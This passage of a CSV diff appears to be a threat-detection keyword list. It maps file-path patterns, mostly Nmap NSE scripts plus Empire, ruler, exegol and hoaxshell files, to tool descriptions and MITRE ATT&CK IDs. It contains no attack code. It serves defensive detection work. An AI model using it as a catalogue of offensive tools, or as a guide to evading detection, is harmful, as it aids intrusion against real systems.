+"*/http-grep.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-hp-ilo-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-huawei-hg5xx-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-icloud-findmyiphone.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-icloud-sendmsg.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-iis-short-name-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-iis-webdav-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-internal-ip-disclosure.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-joomla-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-jsonp-detection.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-lexmark-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z"
+"*/http-lfi.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z"
+"*/http-litespeed-sourcecode-download.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/HTTP-Login.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1109","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*/http-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-majordomo2-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-malware-host.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-mcmp.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-method-tamper.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-mobileversion-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-nikto-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z"
+"*/http-ntlm/ntlmtransport*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
+"*/http-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-open-proxy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-open-redirect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-passwd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-phpmyadmin-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-phpself-xss.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-php-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-proxy-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-put.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-put-server.py*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/http-qnap-nas-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-referer-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-rfi-spider.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-robots.txt.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-robtex-reverse-ip.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-robtex-shared-ns.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/https_payload.ps1*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z"
+"*/http-sap-netweaver-leak.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-security-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-server-header.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-shellshock.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-sitemap-generator.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-slowloris.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-slowloris-check.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-sql-injection.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/https-redirect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-stored-xss.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-svn-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-svn-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-tenda-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z"
+"*/http-title.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-tplink-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-trace.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-traceroute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-trane-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-unsafe-output-escaping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-useragent-tester.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-userdir-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vhosts.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-virustotal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vlcstreamer-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
